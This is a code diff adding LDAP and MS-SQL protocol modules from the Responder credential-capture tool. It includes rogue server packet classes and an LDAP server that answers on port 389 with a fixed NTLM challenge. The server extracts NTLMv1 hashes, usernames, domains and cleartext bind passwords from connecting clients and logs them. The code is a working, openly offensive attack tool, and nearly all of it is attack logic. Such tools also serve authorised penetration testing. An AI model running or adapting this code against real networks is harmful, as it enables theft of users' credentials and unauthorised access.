+# Copyright (C) 2014 Trustwave Holdings, Inc.
+#
+# This program is free software: you can redistribute it and/or modify
+# it under the terms of the GNU General Public License as published by
+# the Free Software Foundation, either version 3 of the License, or
+# (at your option) any later version.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+# GNU General Public License for more details.
+# 
+# You should have received a copy of the GNU General Public License
+# along with this program.  If not, see <http://www.gnu.org/licenses/>.
+
+import struct
+from odict import OrderedDict
+
+class Packet():
+    fields = OrderedDict([
+        ("data", ""),
+    ])
+    def __init__(self, **kw):
+        self.fields = OrderedDict(self.__class__.fields)
+        for k,v in kw.items():
+            if callable(v):
+                self.fields[k] = v(self.fields[k])
+            else:
+                self.fields[k] = v
+    def __str__(self):
+        return "".join(map(str, self.fields.values()))
+
+
+class LDAPSearchDefaultPacket(Packet):
+    fields = OrderedDict([
+        ("ParserHeadASNID",   "\x30"),
+        ("ParserHeadASNLen",  "\x0c"),
+        ("MessageIDASNID",    "\x02"),
+        ("MessageIDASNLen",   "\x01"),
+        ("MessageIDASNStr",   "\x0f"),
+        ("OpHeadASNID",       "\x65"),
+        ("OpHeadASNIDLen",    "\x07"),
+        ("SearchDoneSuccess", "\x0A\x01\x00\x04\x00\x04\x00"),#No Results.
+    ])
+
+class LDAPSearchSupportedCapabilitiesPacket(Packet):
+    fields = OrderedDict([
+        ("ParserHeadASNID",          "\x30"),
+        ("ParserHeadASNLenOfLen",    "\x84"),
+        ("ParserHeadASNLen",         "\x00\x00\x00\x7e"),#126
+        ("MessageIDASNID",           "\x02"),
+        ("MessageIDASNLen",          "\x01"),
+        ("MessageIDASNStr",          "\x02"),
+        ("OpHeadASNID",              "\x64"),
+        ("OpHeadASNIDLenOfLen",      "\x84"),
+        ("OpHeadASNIDLen",           "\x00\x00\x00\x75"),#117
+        ("ObjectName",               "\x04\x00"),
+        ("SearchAttribASNID",        "\x30"),
+        ("SearchAttribASNLenOfLen",  "\x84"),
+        ("SearchAttribASNLen",       "\x00\x00\x00\x6d"),#109
+        ("SearchAttribASNID1",       "\x30"),
+        ("SearchAttribASN1LenOfLen", "\x84"),
+        ("SearchAttribASN1Len",      "\x00\x00\x00\x67"),#103
+        ("SearchAttribASN2ID",       "\x04"),
+        ("SearchAttribASN2Len",      "\x15"),#21
+        ("SearchAttribASN2Str",      "supportedCapabilities"),
+        ("SearchAttribASN3ID",       "\x31"),
+        ("SearchAttribASN3LenOfLen", "\x84"),
+        ("SearchAttribASN3Len",      "\x00\x00\x00\x4a"),
+        ("SearchAttrib1ASNID",       "\x04"),
+        ("SearchAttrib1ASNLen",      "\x16"),#22
+        ("SearchAttrib1ASNStr",      "1.2.840.113556.1.4.800"),
+        ("SearchAttrib2ASNID",       "\x04"),
+        ("SearchAttrib2ASNLen",      "\x17"),#23
+        ("SearchAttrib2ASNStr",      "1.2.840.113556.1.4.1670"),
+        ("SearchAttrib3ASNID",       "\x04"),
+        ("SearchAttrib3ASNLen",      "\x17"),#23
+        ("SearchAttrib3ASNStr",      "1.2.840.113556.1.4.1791"),
+        ("SearchDoneASNID",          "\x30"),
+        ("SearchDoneASNLenOfLen",    "\x84"),
+        ("SearchDoneASNLen",         "\x00\x00\x00\x10"),#16
+        ("MessageIDASN2ID",          "\x02"),
+        ("MessageIDASN2Len",         "\x01"),
+        ("MessageIDASN2Str",         "\x02"),
+        ("SearchDoneStr",            "\x65\x84\x00\x00\x00\x07\x0a\x01\x00\x04\x00\x04\x00"),
+        ## No need to calculate anything this time, this packet is generic.
+    ])
+
+class LDAPSearchSupportedMechanismsPacket(Packet):
+    fields = OrderedDict([
+        ("ParserHeadASNID",          "\x30"),
+        ("ParserHeadASNLenOfLen",    "\x84"),
+        ("ParserHeadASNLen",         "\x00\x00\x00\x60"),#96
+        ("MessageIDASNID",           "\x02"),
+        ("MessageIDASNLen",          "\x01"),
+        ("MessageIDASNStr",          "\x02"),
+        ("OpHeadASNID",              "\x64"),
+        ("OpHeadASNIDLenOfLen",      "\x84"),
+        ("OpHeadASNIDLen",           "\x00\x00\x00\x57"),#87
+        ("ObjectName",               "\x04\x00"),
+        ("SearchAttribASNID",        "\x30"),
+        ("SearchAttribASNLenOfLen",  "\x84"),
+        ("SearchAttribASNLen",       "\x00\x00\x00\x4f"),#79
+        ("SearchAttribASNID1",       "\x30"),
+        ("SearchAttribASN1LenOfLen", "\x84"),
+        ("SearchAttribASN1Len",      "\x00\x00\x00\x49"),#73
+        ("SearchAttribASN2ID",       "\x04"),
+        ("SearchAttribASN2Len",      "\x17"),#23
+        ("SearchAttribASN2Str",      "supportedSASLMechanisms"),
+        ("SearchAttribASN3ID",       "\x31"),
+        ("SearchAttribASN3LenOfLen", "\x84"),
+        ("SearchAttribASN3Len",      "\x00\x00\x00\x2a"),#42
+        ("SearchAttrib1ASNID",       "\x04"),
+        ("SearchAttrib1ASNLen",      "\x06"),#6
+        ("SearchAttrib1ASNStr",      "GSSAPI"),
+        ("SearchAttrib2ASNID",       "\x04"),
+        ("SearchAttrib2ASNLen",      "\x0a"),#10
+        ("SearchAttrib2ASNStr",      "GSS-SPNEGO"),
+        ("SearchAttrib3ASNID",       "\x04"),
+        ("SearchAttrib3ASNLen",      "\x08"),#8
+        ("SearchAttrib3ASNStr",      "EXTERNAL"),
+        ("SearchAttrib4ASNID",       "\x04"),
+        ("SearchAttrib4ASNLen",      "\x0a"),#10
+        ("SearchAttrib4ASNStr",      "DIGEST-MD5"),
+        ("SearchDoneASNID",          "\x30"),
+        ("SearchDoneASNLenOfLen",    "\x84"),
+        ("SearchDoneASNLen",         "\x00\x00\x00\x10"),#16
+        ("MessageIDASN2ID",          "\x02"),
+        ("MessageIDASN2Len",         "\x01"),
+        ("MessageIDASN2Str",         "\x02"),
+        ("SearchDoneStr",            "\x65\x84\x00\x00\x00\x07\x0a\x01\x00\x04\x00\x04\x00"),
+        ## No need to calculate anything this time, this packet is generic.
+    ])
+
+class LDAPNTLMChallenge(Packet):
+    fields = OrderedDict([
+        ("ParserHeadASNID",          "\x30"),
+        ("ParserHeadASNLenOfLen",    "\x84"),
+        ("ParserHeadASNLen",         "\x00\x00\x00\xD0"),#208
+        ("MessageIDASNID",           "\x02"),
+        ("MessageIDASNLen",          "\x01"),
+        ("MessageIDASNStr",          "\x02"),
+        ("OpHeadASNID",              "\x61"),
+        ("OpHeadASNIDLenOfLen",      "\x84"),
+        ("OpHeadASNIDLen",           "\x00\x00\x00\xc7"),#199
+        ("Status",                   "\x0A"),
+        ("StatusASNLen",             "\x01"),
+        ("StatusASNStr",             "\x0e"), #In Progress.
+        ("MatchedDN",                "\x04\x00"), #Null
+        ("ErrorMessage",             "\x04\x00"), #Null
+        ("SequenceHeader",           "\x87"),
+        ("SequenceHeaderLenOfLen",   "\x81"),
+        ("SequenceHeaderLen",        "\x82"), #188
+        ("NTLMSSPSignature",         "NTLMSSP"),
+        ("NTLMSSPSignatureNull",  "\x00"),
+        ("NTLMSSPMessageType",    "\x02\x00\x00\x00"),
+        ("NTLMSSPNtWorkstationLen","\x1e\x00"),
+        ("NTLMSSPNtWorkstationMaxLen","\x1e\x00"),
+        ("NTLMSSPNtWorkstationBuffOffset","\x38\x00\x00\x00"),
+        ("NTLMSSPNtNegotiateFlags","\x15\x82\x89\xe2"),
+        ("NTLMSSPNtServerChallenge","\x81\x22\x33\x34\x55\x46\xe7\x88"),
+        ("NTLMSSPNtReserved","\x00\x00\x00\x00\x00\x00\x00\x00"),
+        ("NTLMSSPNtTargetInfoLen","\x94\x00"),
+        ("NTLMSSPNtTargetInfoMaxLen","\x94\x00"),
+        ("NTLMSSPNtTargetInfoBuffOffset","\x56\x00\x00\x00"),
+        ("NegTokenInitSeqMechMessageVersionHigh","\x05"),
+        ("NegTokenInitSeqMechMessageVersionLow","\x02"),
+        ("NegTokenInitSeqMechMessageVersionBuilt","\xce\x0e"),
+        ("NegTokenInitSeqMechMessageVersionReserved","\x00\x00\x00"),
+        ("NegTokenInitSeqMechMessageVersionNTLMType","\x0f"),
+        ("NTLMSSPNtWorkstationName","SMB12"),
+        ("NTLMSSPNTLMChallengeAVPairsId","\x02\x00"),
+        ("NTLMSSPNTLMChallengeAVPairsLen","\x0a\x00"),
+        ("NTLMSSPNTLMChallengeAVPairsUnicodeStr","smb12"),
+        ("NTLMSSPNTLMChallengeAVPairs1Id","\x01\x00"),
+        ("NTLMSSPNTLMChallengeAVPairs1Len","\x1e\x00"),
+        ("NTLMSSPNTLMChallengeAVPairs1UnicodeStr","SERVER2008"), 
+        ("NTLMSSPNTLMChallengeAVPairs2Id","\x04\x00"),
+        ("NTLMSSPNTLMChallengeAVPairs2Len","\x1e\x00"),
+        ("NTLMSSPNTLMChallengeAVPairs2UnicodeStr","smb12.local"), 
+        ("NTLMSSPNTLMChallengeAVPairs3Id","\x03\x00"),
+        ("NTLMSSPNTLMChallengeAVPairs3Len","\x1e\x00"),
+        ("NTLMSSPNTLMChallengeAVPairs3UnicodeStr","SERVER2008.smb12.local"),
+        ("NTLMSSPNTLMChallengeAVPairs5Id","\x05\x00"),
+        ("NTLMSSPNTLMChallengeAVPairs5Len","\x04\x00"),
+        ("NTLMSSPNTLMChallengeAVPairs5UnicodeStr","smb12.local"),
+        ("NTLMSSPNTLMChallengeAVPairs6Id","\x00\x00"),
+        ("NTLMSSPNTLMChallengeAVPairs6Len","\x00\x00"),
+    ])
+
+    def calculate(self):
+
+        ##Convert strings to Unicode first...
+        self.fields["NTLMSSPNtWorkstationName"] = self.fields["NTLMSSPNtWorkstationName"].encode('utf-16le')
+        self.fields["NTLMSSPNTLMChallengeAVPairsUnicodeStr"] = self.fields["NTLMSSPNTLMChallengeAVPairsUnicodeStr"].encode('utf-16le')
+        self.fields["NTLMSSPNTLMChallengeAVPairs1UnicodeStr"] = self.fields["NTLMSSPNTLMChallengeAVPairs1UnicodeStr"].encode('utf-16le')
+        self.fields["NTLMSSPNTLMChallengeAVPairs2UnicodeStr"] = self.fields["NTLMSSPNTLMChallengeAVPairs2UnicodeStr"].encode('utf-16le')
+        self.fields["NTLMSSPNTLMChallengeAVPairs3UnicodeStr"] = self.fields["NTLMSSPNTLMChallengeAVPairs3UnicodeStr"].encode('utf-16le')
+        self.fields["NTLMSSPNTLMChallengeAVPairs5UnicodeStr"] = self.fields["NTLMSSPNTLMChallengeAVPairs5UnicodeStr"].encode('utf-16le')
+
+        ###### Workstation Offset
+        CalculateOffsetWorkstation = str(self.fields["NTLMSSPSignature"])+str(self.fields["NTLMSSPSignatureNull"])+str(self.fields["NTLMSSPMessageType"])+str(self.fields["NTLMSSPNtWorkstationLen"])+str(self.fields["NTLMSSPNtWorkstationMaxLen"])+str(self.fields["NTLMSSPNtWorkstationBuffOffset"])+str(self.fields["NTLMSSPNtNegotiateFlags"])+str(self.fields["NTLMSSPNtServerChallenge"])+str(self.fields["NTLMSSPNtReserved"])+str(self.fields["NTLMSSPNtTargetInfoLen"])+str(self.fields["NTLMSSPNtTargetInfoMaxLen"])+str(self.fields["NTLMSSPNtTargetInfoBuffOffset"])+str(self.fields["NegTokenInitSeqMechMessageVersionHigh"])+str(self.fields["NegTokenInitSeqMechMessageVersionLow"])+str(self.fields["NegTokenInitSeqMechMessageVersionBuilt"])+str(self.fields["NegTokenInitSeqMechMessageVersionReserved"])+str(self.fields["NegTokenInitSeqMechMessageVersionNTLMType"])
+
+        ###### AvPairs Offset
+        CalculateLenAvpairs = str(self.fields["NTLMSSPNTLMChallengeAVPairsId"])+str(self.fields["NTLMSSPNTLMChallengeAVPairsLen"])+str(self.fields["NTLMSSPNTLMChallengeAVPairsUnicodeStr"])+str(self.fields["NTLMSSPNTLMChallengeAVPairs1Id"])+str(self.fields["NTLMSSPNTLMChallengeAVPairs1Len"])+str(self.fields["NTLMSSPNTLMChallengeAVPairs1UnicodeStr"])+(self.fields["NTLMSSPNTLMChallengeAVPairs2Id"])+str(self.fields["NTLMSSPNTLMChallengeAVPairs2Len"])+str(self.fields["NTLMSSPNTLMChallengeAVPairs2UnicodeStr"])+(self.fields["NTLMSSPNTLMChallengeAVPairs3Id"])+str(self.fields["NTLMSSPNTLMChallengeAVPairs3Len"])+str(self.fields["NTLMSSPNTLMChallengeAVPairs3UnicodeStr"])+(self.fields["NTLMSSPNTLMChallengeAVPairs5Id"])+str(self.fields["NTLMSSPNTLMChallengeAVPairs5Len"])+str(self.fields["NTLMSSPNTLMChallengeAVPairs5UnicodeStr"])+(self.fields["NTLMSSPNTLMChallengeAVPairs6Id"])+str(self.fields["NTLMSSPNTLMChallengeAVPairs6Len"])
+
+        ###### LDAP Packet Len
+        CalculatePacketLen = str(self.fields["MessageIDASNID"])+str(self.fields["MessageIDASNLen"])+str(self.fields["MessageIDASNStr"])+str(self.fields["OpHeadASNID"])+str(self.fields["OpHeadASNIDLenOfLen"])+str(self.fields["OpHeadASNIDLen"])+str(self.fields["Status"])+str(self.fields["StatusASNLen"])+str(self.fields["StatusASNStr"])+str(self.fields["MatchedDN"])+str(self.fields["ErrorMessage"])+str(self.fields["SequenceHeader"])+str(self.fields["SequenceHeaderLen"])+str(self.fields["SequenceHeaderLenOfLen"])+CalculateOffsetWorkstation+str(self.fields["NTLMSSPNtWorkstationName"])+CalculateLenAvpairs
+
+
+        OperationPacketLen = str(self.fields["Status"])+str(self.fields["StatusASNLen"])+str(self.fields["StatusASNStr"])+str(self.fields["MatchedDN"])+str(self.fields["ErrorMessage"])+str(self.fields["SequenceHeader"])+str(self.fields["SequenceHeaderLen"])+str(self.fields["SequenceHeaderLenOfLen"])+CalculateOffsetWorkstation+str(self.fields["NTLMSSPNtWorkstationName"])+CalculateLenAvpairs
+
+        NTLMMessageLen = CalculateOffsetWorkstation+str(self.fields["NTLMSSPNtWorkstationName"])+CalculateLenAvpairs
+
+        ##### LDAP Len Calculation:
+        self.fields["ParserHeadASNLen"] = struct.pack(">i", len(CalculatePacketLen))
+        self.fields["OpHeadASNIDLen"] = struct.pack(">i", len(OperationPacketLen))
+        self.fields["SequenceHeaderLen"] = struct.pack(">B", len(NTLMMessageLen))
+
+        ##### Workstation Offset Calculation:
+        self.fields["NTLMSSPNtWorkstationBuffOffset"] = struct.pack("<i", len(CalculateOffsetWorkstation))
+        self.fields["NTLMSSPNtWorkstationLen"] = struct.pack("<h", len(str(self.fields["NTLMSSPNtWorkstationName"])))
+        self.fields["NTLMSSPNtWorkstationMaxLen"] = struct.pack("<h", len(str(self.fields["NTLMSSPNtWorkstationName"])))
+
+        ##### IvPairs Offset Calculation:
+        self.fields["NTLMSSPNtTargetInfoBuffOffset"] = struct.pack("<i", len(CalculateOffsetWorkstation+str(self.fields["NTLMSSPNtWorkstationName"])))
+        self.fields["NTLMSSPNtTargetInfoLen"] = struct.pack("<h", len(CalculateLenAvpairs))
+        self.fields["NTLMSSPNtTargetInfoMaxLen"] = struct.pack("<h", len(CalculateLenAvpairs))
+        ##### IvPair Calculation:
+        self.fields["NTLMSSPNTLMChallengeAVPairs5Len"] = struct.pack("<h", len(str(self.fields["NTLMSSPNTLMChallengeAVPairs5UnicodeStr"])))
+        self.fields["NTLMSSPNTLMChallengeAVPairs3Len"] = struct.pack("<h", len(str(self.fields["NTLMSSPNTLMChallengeAVPairs3UnicodeStr"])))
+        self.fields["NTLMSSPNTLMChallengeAVPairs2Len"] = struct.pack("<h", len(str(self.fields["NTLMSSPNTLMChallengeAVPairs2UnicodeStr"])))
+        self.fields["NTLMSSPNTLMChallengeAVPairs1Len"] = struct.pack("<h", len(str(self.fields["NTLMSSPNTLMChallengeAVPairs1UnicodeStr"])))
+        self.fields["NTLMSSPNTLMChallengeAVPairsLen"] = struct.pack("<h", len(str(self.fields["NTLMSSPNTLMChallengeAVPairsUnicodeStr"])))
+

core/protocols/ldap/LDAPServer.py

@@ -0,0 +1,121 @@
+##################################################################################
+#LDAP Stuff starts here
+##################################################################################
+
+class LDAPServer():
+
+	def serve_thread_tcp(self, host, port, handler):
+		try:
+			server = ThreadingTCPServer((host, port), handler)
+			server.serve_forever()
+		except Exception, e:
+			print "Error starting TCP server on port %s: %s:" % (str(port),str(e))
+
+	#Function name self-explanatory
+	def start(self, LDAP_On_Off):
+		if LDAP_On_Off == "ON":
+			t = threading.Thread(name="LDAP", target=self.serve_thread_tcp, args=("0.0.0.0", 389,LDAP))
+			t.setDaemon(True)
+			t.start()
+		
+		if LDAP_On_Off == "OFF":
+			return False
+
+class ThreadingTCPServer(ThreadingMixIn, TCPServer):
+
+	allow_reuse_address = 1
+
+	def server_bind(self):
+		TCPServer.server_bind(self)
+
+def ParseSearch(data):
+	Search1 = re.search('(objectClass)', data)
+	Search2 = re.search('(?i)(objectClass0*.*supportedCapabilities)', data)
+	Search3 = re.search('(?i)(objectClass0*.*supportedSASLMechanisms)', data)
+	if Search1:
+		return str(LDAPSearchDefaultPacket(MessageIDASNStr=data[8:9]))
+	if Search2:
+		return str(LDAPSearchSupportedCapabilitiesPacket(MessageIDASNStr=data[8:9],MessageIDASN2Str=data[8:9]))
+	if Search3:
+		return str(LDAPSearchSupportedMechanismsPacket(MessageIDASNStr=data[8:9],MessageIDASN2Str=data[8:9]))
+
+def ParseLDAPHash(data,client):
+	SSPIStarts = data[42:]
+	LMhashLen = struct.unpack('<H',data[54:56])[0]
+	if LMhashLen > 10:
+		LMhashOffset = struct.unpack('<H',data[58:60])[0]
+		LMHash = SSPIStarts[LMhashOffset:LMhashOffset+LMhashLen].encode("hex").upper()
+		NthashLen = struct.unpack('<H',data[64:66])[0]
+		NthashOffset = struct.unpack('<H',data[66:68])[0]
+		NtHash = SSPIStarts[NthashOffset:NthashOffset+NthashLen].encode("hex").upper()
+		DomainLen = struct.unpack('<H',data[72:74])[0]
+		DomainOffset = struct.unpack('<H',data[74:76])[0]
+		Domain = SSPIStarts[DomainOffset:DomainOffset+DomainLen].replace('\x00','')
+		UserLen = struct.unpack('<H',data[80:82])[0]
+		UserOffset = struct.unpack('<H',data[82:84])[0]
+		User = SSPIStarts[UserOffset:UserOffset+UserLen].replace('\x00','')
+		writehash = User+"::"+Domain+":"+LMHash+":"+NtHash+":"+NumChal
+		Outfile = "./logs/responder/LDAP-NTLMv1-"+client+".txt"
+		WriteData(Outfile,writehash,User+"::"+Domain)
+		#print "[LDAP] NTLMv1 complete hash is :", writehash
+		responder_logger.info('[LDAP] NTLMv1 complete hash is :%s'%(writehash))
+	if LMhashLen <2 :
+		Message = '[+]LDAP Anonymous NTLM authentication, ignoring..'
+		#print Message
+		responder_logger.info(Message)
+
+def ParseNTLM(data,client):
+	Search1 = re.search('(NTLMSSP\x00\x01\x00\x00\x00)', data)
+	Search2 = re.search('(NTLMSSP\x00\x03\x00\x00\x00)', data)
+	if Search1:
+		NTLMChall = LDAPNTLMChallenge(MessageIDASNStr=data[8:9],NTLMSSPNtServerChallenge=Challenge)
+		NTLMChall.calculate()
+		return str(NTLMChall)
+	if Search2:
+		ParseLDAPHash(data,client)
+
+def ParseLDAPPacket(data,client):
+	if data[1:2] == '\x84':
+		PacketLen = struct.unpack('>i',data[2:6])[0]
+		MessageSequence = struct.unpack('<b',data[8:9])[0]
+		Operation = data[9:10]
+		sasl = data[20:21]
+		OperationHeadLen = struct.unpack('>i',data[11:15])[0]
+		LDAPVersion = struct.unpack('<b',data[17:18])[0]
+		if Operation == "\x60":
+			UserDomainLen = struct.unpack('<b',data[19:20])[0]
+			UserDomain = data[20:20+UserDomainLen]
+			AuthHeaderType = data[20+UserDomainLen:20+UserDomainLen+1]
+			if AuthHeaderType == "\x80":
+				PassLen = struct.unpack('<b',data[20+UserDomainLen+1:20+UserDomainLen+2])[0]
+				Password = data[20+UserDomainLen+2:20+UserDomainLen+2+PassLen]
+				#print '[LDAP]Clear Text User & Password is:', UserDomain+":"+Password
+				outfile = "./logs/responder/LDAP-Clear-Text-Password-"+client+".txt"
+				WriteData(outfile,'[LDAP]User: %s Password: %s'%(UserDomain,Password),'[LDAP]User: %s Password: %s'%(UserDomain,Password))
+				responder_logger.info('[LDAP]User: %s Password: %s'%(UserDomain,Password))
+			if sasl == "\xA3":
+				buff = ParseNTLM(data,client)
+				return buff
+		elif Operation == "\x63":
+			buff = ParseSearch(data)
+			return buff
+		else:
+			responder_logger.info('[LDAP]Operation not supported')
+
+#LDAP Server Class
+class LDAP(BaseRequestHandler):
+
+	def handle(self):
+		try:
+			while True:
+				self.request.settimeout(0.5)
+				data = self.request.recv(8092)
+				buffer0 = ParseLDAPPacket(data,self.client_address[0])
+				if buffer0:
+					self.request.send(buffer0)
+		except Exception:
+			pass #No need to print timeout errors.
+
+##################################################################################
+#LDAP Stuff ends here
+##################################################################################

core/protocols/mssql/MSSQLPackets.py

@@ -0,0 +1,167 @@
+#! /usr/bin/env python
+# NBT-NS/LLMNR Responder
+# Created by Laurent Gaffie
+# Copyright (C) 2014 Trustwave Holdings, Inc.
+#
+# This program is free software: you can redistribute it and/or modify
+# it under the terms of the GNU General Public License as published by
+# the Free Software Foundation, either version 3 of the License, or
+# (at your option) any later version.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+# GNU General Public License for more details.
+# 
+# You should have received a copy of the GNU General Public License
+# along with this program.  If not, see <http://www.gnu.org/licenses/>.
+import struct
+from odict import OrderedDict
+
+class Packet():
+    fields = OrderedDict([
+        ("data", ""),
+    ])
+    def __init__(self, **kw):
+        self.fields = OrderedDict(self.__class__.fields)
+        for k,v in kw.items():
+            if callable(v):
+                self.fields[k] = v(self.fields[k])
+            else:
+                self.fields[k] = v
+    def __str__(self):
+        return "".join(map(str, self.fields.values()))
+
+#MS-SQL Pre-login packet class
+class MSSQLPreLoginAnswer(Packet):
+    fields = OrderedDict([
+        ("PacketType",       "\x04"),
+        ("Status",           "\x01"), 
+        ("Len",              "\x00\x25"),
+        ("SPID",             "\x00\x00"),
+        ("PacketID",         "\x01"),
+        ("Window",           "\x00"),
+        ("TokenType",        "\x00"),
+        ("VersionOffset",    "\x00\x15"),
+        ("VersionLen",       "\x00\x06"),
+        ("TokenType1",       "\x01"),
+        ("EncryptionOffset", "\x00\x1b"),
+        ("EncryptionLen",    "\x00\x01"),
+        ("TokenType2",       "\x02"),
+        ("InstOptOffset",    "\x00\x1c"),
+        ("InstOptLen",       "\x00\x01"),
+        ("TokenTypeThrdID",  "\x03"),
+        ("ThrdIDOffset",     "\x00\x1d"),
+        ("ThrdIDLen",        "\x00\x00"),
+        ("ThrdIDTerminator", "\xff"),
+        ("VersionStr",       "\x09\x00\x0f\xc3"),
+        ("SubBuild",         "\x00\x00"),
+        ("EncryptionStr",    "\x02"),
+        ("InstOptStr",       "\x00"),
+        ]) 
+
+    def calculate(self):
+        CalculateCompletePacket = str(self.fields["PacketType"])+str(self.fields["Status"])+str(self.fields["Len"])+str(self.fields["SPID"])+str(self.fields["PacketID"])+str(self.fields["Window"])+str(self.fields["TokenType"])+str(self.fields["VersionOffset"])+str(self.fields["VersionLen"])+str(self.fields["TokenType1"])+str(self.fields["EncryptionOffset"])+str(self.fields["EncryptionLen"])+str(self.fields["TokenType2"])+str(self.fields["InstOptOffset"])+str(self.fields["InstOptLen"])+str(self.fields["TokenTypeThrdID"])+str(self.fields["ThrdIDOffset"])+str(self.fields["ThrdIDLen"])+str(self.fields["ThrdIDTerminator"])+str(self.fields["VersionStr"])+str(self.fields["SubBuild"])+str(self.fields["EncryptionStr"])+str(self.fields["InstOptStr"])
+
+        VersionOffset = str(self.fields["TokenType"])+str(self.fields["VersionOffset"])+str(self.fields["VersionLen"])+str(self.fields["TokenType1"])+str(self.fields["EncryptionOffset"])+str(self.fields["EncryptionLen"])+str(self.fields["TokenType2"])+str(self.fields["InstOptOffset"])+str(self.fields["InstOptLen"])+str(self.fields["TokenTypeThrdID"])+str(self.fields["ThrdIDOffset"])+str(self.fields["ThrdIDLen"])+str(self.fields["ThrdIDTerminator"])
+
+        EncryptionOffset = VersionOffset+str(self.fields["VersionStr"])+str(self.fields["SubBuild"])
+
+        InstOpOffset = EncryptionOffset+str(self.fields["EncryptionStr"])
+         
+        ThrdIDOffset = InstOpOffset+str(self.fields["InstOptStr"])
+
+        self.fields["Len"] = struct.pack(">h",len(CalculateCompletePacket))
+        #Version
+        self.fields["VersionLen"] = struct.pack(">h",len(self.fields["VersionStr"]+self.fields["SubBuild"]))
+        self.fields["VersionOffset"] = struct.pack(">h",len(VersionOffset))
+        #Encryption
+        self.fields["EncryptionLen"] = struct.pack(">h",len(self.fields["EncryptionStr"]))
+        self.fields["EncryptionOffset"] = struct.pack(">h",len(EncryptionOffset))
+        #InstOpt
+        self.fields["InstOptLen"] = struct.pack(">h",len(self.fields["InstOptStr"]))
+        self.fields["EncryptionOffset"] = struct.pack(">h",len(InstOpOffset))
+        #ThrdIDOffset
+        self.fields["ThrdIDOffset"] = struct.pack(">h",len(ThrdIDOffset))
+
+#MS-SQL NTLM Negotiate packet class
+class MSSQLNTLMChallengeAnswer(Packet):
+    fields = OrderedDict([
+        ("PacketType",       "\x04"), 
+        ("Status",           "\x01"),
+        ("Len",              "\x00\xc7"),
+        ("SPID",             "\x00\x00"),
+        ("PacketID",         "\x01"),
+        ("Window",           "\x00"),
+        ("TokenType",        "\xed"),
+        ("SSPIBuffLen",      "\xbc\x00"),
+        ("Signature",        "NTLMSSP"),
+        ("SignatureNull",    "\x00"),
+        ("MessageType",      "\x02\x00\x00\x00"),
+        ("TargetNameLen",    "\x06\x00"),
+        ("TargetNameMaxLen", "\x06\x00"),
+        ("TargetNameOffset", "\x38\x00\x00\x00"),
+        ("NegoFlags",        "\x05\x02\x89\xa2"),
+        ("ServerChallenge",  ""),
+        ("Reserved",         "\x00\x00\x00\x00\x00\x00\x00\x00"),
+        ("TargetInfoLen",    "\x7e\x00"),
+        ("TargetInfoMaxLen", "\x7e\x00"),
+        ("TargetInfoOffset", "\x3e\x00\x00\x00"),
+        ("NTLMOsVersion",    "\x05\x02\xce\x0e\x00\x00\x00\x0f"),
+        ("TargetNameStr",    "SMB"),
+        ("Av1",              "\x02\x00"),#nbt name
+        ("Av1Len",           "\x06\x00"),
+        ("Av1Str",           "SMB"),
+        ("Av2",              "\x01\x00"),#Server name
+        ("Av2Len",           "\x14\x00"),
+        ("Av2Str",           "SMB-TOOLKIT"),
+        ("Av3",              "\x04\x00"),#Full Domain name
+        ("Av3Len",           "\x12\x00"),
+        ("Av3Str",           "smb.local"),
+        ("Av4",              "\x03\x00"),#Full machine domain name
+        ("Av4Len",           "\x28\x00"),
+        ("Av4Str",           "server2003.smb.local"),
+        ("Av5",              "\x05\x00"),#Domain Forest Name
+        ("Av5Len",           "\x12\x00"),
+        ("Av5Str",           "smb.local"),
+        ("Av6",              "\x00\x00"),#AvPairs Terminator
+        ("Av6Len",           "\x00\x00"),
+        ]) 
+
+    def calculate(self):
+        ##First convert to uni
+        self.fields["TargetNameStr"] = self.fields["TargetNameStr"].encode('utf-16le')
+        self.fields["Av1Str"] = self.fields["Av1Str"].encode('utf-16le')
+        self.fields["Av2Str"] = self.fields["Av2Str"].encode('utf-16le')
+        self.fields["Av3Str"] = self.fields["Av3Str"].encode('utf-16le')
+        self.fields["Av4Str"] = self.fields["Av4Str"].encode('utf-16le')
+        self.fields["Av5Str"] = self.fields["Av5Str"].encode('utf-16le')
+        ##Then calculate
+
+        CalculateCompletePacket = str(self.fields["PacketType"])+str(self.fields["Status"])+str(self.fields["Len"])+str(self.fields["SPID"])+str(self.fields["PacketID"])+str(self.fields["Window"])+str(self.fields["TokenType"])+str(self.fields["SSPIBuffLen"])+str(self.fields["Signature"])+str(self.fields["SignatureNull"])+str(self.fields["MessageType"])+str(self.fields["TargetNameLen"])+str(self.fields["TargetNameMaxLen"])+str(self.fields["TargetNameOffset"])+str(self.fields["NegoFlags"])+str(self.fields["ServerChallenge"])+str(self.fields["Reserved"])+str(self.fields["TargetInfoLen"])+str(self.fields["TargetInfoMaxLen"])+str(self.fields["TargetInfoOffset"])+str(self.fields["NTLMOsVersion"])+str(self.fields["TargetNameStr"])+str(self.fields["Av1"])+str(self.fields["Av1Len"])+str(self.fields["Av1Str"])+str(self.fields["Av2"])+str(self.fields["Av2Len"])+str(self.fields["Av2Str"])+str(self.fields["Av3"])+str(self.fields["Av3Len"])+str(self.fields["Av3Str"])+str(self.fields["Av4"])+str(self.fields["Av4Len"])+str(self.fields["Av4Str"])+str(self.fields["Av5"])+str(self.fields["Av5Len"])+str(self.fields["Av5Str"])+str(self.fields["Av6"])+str(self.fields["Av6Len"])
+
+        CalculateSSPI = str(self.fields["Signature"])+str(self.fields["SignatureNull"])+str(self.fields["MessageType"])+str(self.fields["TargetNameLen"])+str(self.fields["TargetNameMaxLen"])+str(self.fields["TargetNameOffset"])+str(self.fields["NegoFlags"])+str(self.fields["ServerChallenge"])+str(self.fields["Reserved"])+str(self.fields["TargetInfoLen"])+str(self.fields["TargetInfoMaxLen"])+str(self.fields["TargetInfoOffset"])+str(self.fields["NTLMOsVersion"])+str(self.fields["TargetNameStr"])+str(self.fields["Av1"])+str(self.fields["Av1Len"])+str(self.fields["Av1Str"])+str(self.fields["Av2"])+str(self.fields["Av2Len"])+str(self.fields["Av2Str"])+str(self.fields["Av3"])+str(self.fields["Av3Len"])+str(self.fields["Av3Str"])+str(self.fields["Av4"])+str(self.fields["Av4Len"])+str(self.fields["Av4Str"])+str(self.fields["Av5"])+str(self.fields["Av5Len"])+str(self.fields["Av5Str"])+str(self.fields["Av6"])+str(self.fields["Av6Len"])
+
